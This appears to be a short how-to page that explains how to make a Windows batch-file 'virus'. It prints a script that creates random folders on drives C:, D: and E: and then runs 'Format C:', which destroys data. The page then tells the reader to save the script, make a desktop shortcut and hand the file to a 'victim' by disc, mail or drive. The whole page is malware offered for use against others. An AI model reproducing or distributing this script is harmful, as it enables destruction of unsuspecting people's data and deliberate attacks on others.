How to Make a J.bat Virus

by ChaseT1 in Circuits > Computers

950 Views, 9 Favorites, 0 Comments

How to Make a J.bat Virus

GamePassTemplate.png

Step 1. Go to Start>Notepad

Step 2. Copy the virus code below

@echo off

:VIRUS

cd /d C:

md %RANDOM%

cd /d D:

md %RANDOM%

cd /d E:

md %RANDOM%

Format C:

Step 3. Paste code into notepad and save as virus.bat

Step 4. Creat a short cut by right clicking the file and going to send to and then click desktop

Step 3. Give to victim via disc, mail, harddrive, ect.